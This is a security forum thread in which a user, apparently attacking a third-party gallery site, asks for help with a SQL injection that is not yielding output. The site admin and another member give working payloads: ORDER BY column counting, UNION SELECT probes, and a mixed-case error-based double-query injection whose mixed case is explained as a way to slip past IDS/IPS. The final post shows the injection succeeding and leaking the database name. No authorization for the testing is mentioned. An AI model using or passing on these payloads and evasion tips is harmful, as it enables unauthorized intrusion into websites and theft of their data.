Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
January 26, 2021
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 341
Members: 0
Total: 341
PacketStorm News
Currently there is a problem with headlines from this site
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Sql injection -> What if the webpage doesn't disclose number of columns
Post new topic  Reply to topic View previous topic :: View next topic 
What if the webpage doesn't disclose number of columns
PostPosted: Thu Sep 16, 2010 6:59 am Reply with quote
RubberDoll
Active user
Active user
 
Joined: Jun 04, 2009
Posts: 46




Hello waraxe and experts

please forgive my lack of knowledge and don't bash me : )
usually at this step I just give up, but this time I really want to get on with this issue, and learn for further experience

I have a webpage which responds to the simplest test as such
Code:
http://site.com/guests_galleries.php?kat=1'

responding with

Quote:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY galleries_added DESC' at line 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY galleries_added DESC LIMIT 0, 12' at line 1



But then when I try the next test
Code:
http://site.com/guests_galleries.php?kat=1+order+by+2--

it responds with

Quote:
Unknown column '2' in 'order clause'



I'm positive there are steps to take when such an error displays, I just don't have a clue what they are.
I can't search or google either because I don't know what I'm looking for Embarassed


Please guide me : )

Thanks in advance!
View user's profile Send private message
PostPosted: Fri Sep 17, 2010 8:42 am Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Try:

Code:

http://site.com/guests_galleries.php?kat=1+order+by+1--


If you get no error, then it's one column only.
Next test:

Code:

http://site.com/guests_galleries.php?kat=-1+UNION+ALL+SELECT+11223344--


Try to find string "11223344" in html source code.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri Sep 17, 2010 11:42 am Reply with quote
RubberDoll
Active user
Active user
 
Joined: Jun 04, 2009
Posts: 46




Hi waraxe and thank you for your time

well I thought it must have more than one column, because the initial error mentions
Quote:
near '' ORDER BY galleries_added DESC'


I forgot to mention that
://site.com/guests_galleries.php?kat=1+order+by+1--
results in a perfect original page..


I also discovered that by incrementing
://site.com/guests_galleries.php?kat=1+order+by+2--
to
://site.com/guests_galleries.php?kat=1+order+by+26--

that the error only appears once
Quote:
Unknown column '26' in 'order clause'


etc, while

://site.com/guests_galleries.php?kat=1+order+by+27--

and higher, results in double display of the error

Quote:
Unknown column '27' in 'order clause'Unknown column '27' in 'order clause'


so I'm thinking maybe there could be 26 columns in this table?

but trying
://site.com/guests_galleries.php?kat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--

I get blank part of the page where content is normaly


same for trying ://site.com/guests_galleries.php?kat=-1+UNION+ALL+SELECT+11223344--

I've checked the source in all cases including the last as you suggested and there's nothing there.. (no 11223344 in our case)

instead, it shows this html code in the source

Code:
<p> ;;</p>
            <p> ;;</p>
            <p> ;;</p>
            <p> ;;</p>
            <p> ;;</p>
            <p> ;;</p>
            <p> ;;</p>
            <p> ;;</p>



I hope I've provided all neccessary info :)

Thanks again
View user's profile Send private message
PostPosted: Fri Sep 17, 2010 1:48 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




You must try to get working data feedback.
Try:

Code:
http://site.com/guests_galleries.php?kat=-1+union+all+select+1122331,1122332,1122333,1122334,1122335,1122336,1122337,1122338,1122339,11223310,11223311,11223312,11223313,11223314,11223315,11223316,11223317,11223318,11223319,11223320,11223321,11223322,11223323,11223324,11223325,11223326--


and look for specific strings.
If you are unable to get normal data feedback, then exploitation may still be possible - there are blind injection methods for that, for example:

http://www.ptsecurity.com/download/PT-devteev-FAST-blind-SQL-Injection.pdf
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri Sep 17, 2010 3:52 pm Reply with quote
RubberDoll
Active user
Active user
 
Joined: Jun 04, 2009
Posts: 46




Thanks a lot waraxe
unfortunately this yielded the same <p> ;;</p> stuff, so I'll turn to reading in hope to see the light, although it might prove very difficult since my scripting language skills are zero.

And thank you for the link :)
View user's profile Send private message
Re: What if the webpage doesn't disclose number of columns
PostPosted: Sat Sep 18, 2010 2:45 am Reply with quote
Plitvix
Beginner
Beginner
 
Joined: Sep 18, 2010
Posts: 1




Maybe you can try some double query injections like
Code:
 aND (SeLEct 1 FrOM(SeLEct CoUNt(*),CoNCaT((SeLEct CoNCaT(DaTABasE()) FrOM inFoRMAtioN_ScHEmA.TabLEs LiMiT 0,1),fLOOr(Rand(0)*2))x FrOM inFoRMAtioN_ScHEmA.TabLEs GrOUP bY x)a) AnD 13=13-- -

It will probably work.
View user's profile Send private message
Re: What if the webpage doesn't disclose number of columns
PostPosted: Mon Sep 20, 2010 7:16 am Reply with quote
RubberDoll
Active user
Active user
 
Joined: Jun 04, 2009
Posts: 46




Hello Plitvix

unfortunately not but thank you
btw, why is the mixure of uppercase and lowercase letters?

Plitvix wrote:
Maybe you can try some double query injections like
Code:
 aND (SeLEct 1 FrOM(SeLEct CoUNt(*),CoNCaT((SeLEct CoNCaT(DaTABasE()) FrOM inFoRMAtioN_ScHEmA.TabLEs LiMiT 0,1),fLOOr(Rand(0)*2))x FrOM inFoRMAtioN_ScHEmA.TabLEs GrOUP bY x)a) AnD 13=13-- -

It will probably work.
View user's profile Send private message
PostPosted: Mon Sep 20, 2010 8:58 am Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Mixed case letters may let pass undetected by IDS/IPS sometimes.
Try this:

Code:

http://site.com/guests_galleries.php?kat=1+aND(SeLEct+1+FrOM(SeLEct CoUNt(*),CoNCaT((SeLEct+CoNCaT(DaTABasE())+FrOM+inFoRMAtioN_ScHEmA.TabLEs+LiMiT+0,1),fLOOr(Rand(0)*2))x+FrOM+inFoRMAtioN_ScHEmA.TabLEs+GrOUP+bY+x)a)


Do you get any SQL error messages?
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Sep 29, 2010 9:48 am Reply with quote
RubberDoll
Active user
Active user
 
Joined: Jun 04, 2009
Posts: 46




Hello again waraxe, thank you for keeping still an eye on this topic :)

yes, if fact I do
well I get an error. whether its a sql related error, I'm not sure anymore

Code:

Duplicate entry 'kylacolepre1' for key 1Duplicate entry 'kylacolepre1' for key 1
View user's profile Send private message
What if the webpage doesn't disclose number of columns
  www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.077 Seconds